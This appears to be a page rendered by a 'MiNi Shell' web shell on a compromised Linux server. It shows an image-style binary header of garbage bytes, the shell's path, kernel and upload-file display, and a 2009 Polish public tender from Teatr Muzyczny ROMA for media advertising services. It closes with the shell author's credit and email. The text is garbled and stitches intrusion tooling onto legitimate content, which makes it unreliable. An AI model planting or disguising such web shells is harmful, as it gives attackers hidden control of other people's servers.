JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090205/34179-N-2009.html

<p class="kh_header"><b>Warszawa: OBSŁUGA W ZAKRESIE REKLAMY W MEDIACH.</b><br>
<b>Numer ogłoszenia: 34179 - 2009; data zamieszczenia: 05.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Teatr Muzyczny ROMA w Warszawie , ul. Nowogrodzka 49, 00-695 Warszawa, woj. mazowieckie, tel. 022 6287071, faks 022 6217233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://teatrroma.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OBSŁUGA W ZAKRESIE REKLAMY W MEDIACH..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup mediów w celu przeprowadzenia kampanii reklamowych dotyczących wszelkich działań Teatru Muzycznego ROMA w okresie od podpisania umowy do dnia 31.01.2010 w dwóch zakresach:
1. reklama prasowa 
2. reklama zewnętrzna

Przedmiot zamówienia polega na świadczeniu usług  polegających na dokonywaniu zakupów miejsc reklamowych w prasie oraz  na wielkopowierzchniowych nośnikach reklamy  zewnętrznej  (outdoor) dla celów reklamy działalności Zamawiającego oraz do   wykonywania na rzecz Zamawiającego obsługi reklam prasowych, reklam zamieszczonych  na zewnętrznych  nośnikach reklamowych oraz innych reklam przewidzianych niniejszym zamówieniem.

Zamówienie obejmuje również wydrukowania nośników reklamowych, w tym outdoorowych. Za druk wszystkich nośników odpowiada Wykonawca. 

W ramach  obsługi reklam prasowych i zewnętrznych  nośników reklamowych do obowiązków Wykonawcy będzie  należało: 
1) przyjmowanie od Zamawiającego zleceń i materiałów,
2) przygotowywanie planu produkcyjnego
3) wykonywaniu montażu reklam w miejscu ekspozycji  reklamy Zamawiającego,
4) wykonywaniu demontażu reklam ,
5) nadzorowanie prawidłowego  i terminowego zamieszczania reklam w prasie  
6) nadzorowanie prawidłowej i terminowej  ekspozycji reklam na nośnikach zewnętrznych  
7) przyjmowanie i rozpatrywanie wszelkich zgłaszanych przez Zamawiającego uwag, zastrzeżeń i reklamacji dotyczących wykonywanej na jego rzecz usługi,
8) informowanie Zamawiającego o wszelkich planowanych przez wydawców prasowych  dodatkach specjalnych, formach reklamy zewnętrznej i innych przedsięwzięciach mogących interesować Zamawiającego.
9) reprezentowanie Zamawiającego przed wydawcami prasowymi oraz instytucjami posiadającymi nośniki reklamy zewnętrznej w zakresie reklamy obejmującej przedmiotowe zamówienie.
Kampania powinna mieć możliwie największy zasięg.

Wykonawca będzie zobowiązany uzgodnić z Zamawiającym miejsce ekspozycji reklamy. Reklama może zostać zamieszczona na nośniku dopiero po uzyskaniu zgody Zamawiającego.

Wykonawca będzie zobowiązany do świadczenia następnego rodzaju reklam:

Outdoor:

- Nośniki  w środkach komunikacji miejskiej (tramwaje, autobusy) -  w miastach Warszawa, Kraków, Gdańsk, Poznań (przynajmniej jedna z ekspozycji będzie miała miejsce w  Warszawie, pozostałe miejsca ekspozycji (miasta) do wyboru przez Zamawiającego).

Na jedną emisję składa się minimum 20 nośników.

Okres jednej ekspozycji powinien wynosić nie mniej niż jeden miesiąc.

Ilość ekspozycji: 3

- Frontliny 50 - Warszawa

Na jedną emisję składa się minimum 5  nośników.

Okres jednej ekspozycji powinien wynosić nie mniej niż jeden miesiąc.

Ilość ekspozycji: 3

- Nośniki w warszawskich pociągach podmiejskich.

Na jedną emisję składa się minimum 10  nośników.

Okres jednej ekspozycji powinien wynosić nie mniej niż jeden miesiąc.

Ilość ekspozycji: 3

- Nośniki w metrze - Warszawa

Na jedną emisję składa się minimum 20  nośników.

Okres jednej ekspozycji powinien wynosić nie mniej niż jeden miesiąc.

Ilość ekspozycji: 4

- Megaboard - min. 100 m2 - Warszawa.

Okres jednej ekspozycji powinien wynosić nie mniej niż jeden miesiąc.

Ilość ekspozycji: 5

prasa:

- Gazeta Wyborcza - dodatek TEATRY - 10 modułów - Warszawa
Ilość ekspozycji: 10

- Gazeta Wyborcza - dodatki lokalne - format - propozycja Wykonawcy.
Ilość ekspozycji: 5

- Tygodnik/dwutygodnik  lifestylowy - ogólnopolski  - propozycja Wykonawcy
Ilość ekspozycji: 2

- Dziennik - dodatek KURTYNA - Warszawa - format - propozycja Wykonawcy.
Ilość ekspozycji: 3

inne:

- Internet:  kampania banerowa  na jednym z portali: www.nasza-klasa.pl, www.onet.pl, www.wp.pl, www.gazeta.pl.

Okres jednej ekspozycji powinien wynosić nie mniej niż dwa tygodnie.
Ilość ekspozycji: 4

- Radio o zasięgu Warszawy i okolic - spot 30 sek. 

Okres jednej kampanii - minimum jeden tydzień.
Ilość ekspozycji: 4

- Centra handlowe (audio i video) - kampania ogólnopolska - spoty po 30 sek. 
Umieszczenie ekranów prezentujących spoty reklamowe w centrach handlowych znajdujących się w stolicach województw na terenie Polski.

Na jedną ekspozycję składa się emisja w minimum trzech centrach handlowych, przy czym przynajmniej w jednym centrum handlowym w Warszawie.

Okres jednej ekspozycji powinien wynosić nie mniej niż dwa tygodnie.
Ilość ekspozycji: 10

- Komunikatory i portale społecznościowe, typu gadu-gadu, facebook, grono.pl, tlen itp. o znaczącej pozycji na rynku komunikatorów internetowych.

Okres jednej ekspozycji powinien wynosić nie mniej niż dwa tygodnie.
Ilość ekspozycji: 10

- Ekrany ledowe - kampania ogólnopolska (spot minimum 30 sek.). 

Umieszczenie ekranów w stolicach województw na terenie Polski.

Każda z ekspozycji, powinna trwać nie krócej niż jeden miesiąc i obejmować co najmniej cztery ekrany.
Ilość ekspozycji: 10

Reklama w prasie i radiu powinna zostać umieszczona zgodnie ze zleceniem Zamawiającego. Zamawiający w poszczególnych zleceniach określi daty oraz przybliżone godziny emisji reklamy.

Cena ofertowania przez Wykonawcę nie ulegnie zmianie przez cały okres obowiązywania zamówienia.

Dodatkowe świadczenia reklamowe.
Wykonawcy w ofertach mogą określić dodatkowe rodzaje reklamy proponowanej Zamawiającemu w ramach przedmiotowego zamówienia. Wartość dodatkowych reklam oferowanych przez Wykonawcę powinna zamykać się w ogólnej kwocie proponowanej za wykonanie zamówienia (cenie ryczałtowej) - reklama gratis.
Wykonawcy przedstawiający swoje propozycję reklam dodatkowych powinni określić co najmniej rodzaj nośników reklamowych, ich przeznaczenie oraz zasięg oddziaływania. Zgodnie z opisem przedstawionym przez Wykonawców, Zamawiający przyzna punkty w kryterium oceny ofert: <Świadczenia dodatkowe przewyższające wymogi minimalne kampanii>.

Zamawiający jest uprawniony do skorzystania z mniejszej ilości emisji niż określona w SIWZ. Wykonawca nie będzie rościł sobie praw z tytułu nieskorzystania przez Zamawiającego ze wszystkich reklam..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.34.00.00-9, 79.34.12.00-8, 79.34.14.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia

Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez wykonawcę dokumentów i oświadczeń.

Ocena spełnienia wyżej określonych warunków odbędzie się wg formuły: spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.

Dokumenty powinny zostać dostarczone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Oświadczenia Wykonawcy składają wyłącznie w formie oryginału..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zwanej dalej ustawą, Zamawiający żąda następujących dokumentów:

a.	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.

2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu opisanych w art. 22 ustawy Prawo zamówień publicznych, Zamawiający żąda:

a.  przedstawienia oświadczenia potwierdzającego spełnienie warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 95</li>
<li>2 - Świadczenia dodatkowe przewyższające wymogi minimalne kampanii - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://teatrroma.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Teatr Muzyczny ROMA w Warszawie, 
ul. Nowogrodzka 49, 
00-695 Warszawa
Sekretariat Teatru pracuje od poniedziałku do piątku w godzinach 9:00-17:00..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2009 godzina 13:00, miejsce: Teatr Muzyczny ROMA w Warszawie, 
ul. Nowogrodzka 49, 
00-695 Warszawa
Sekretariat (pokój nr 10). 
Sekretariat Teatru pracuje od poniedziałku do piątku w godzinach 9:00-17:00..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com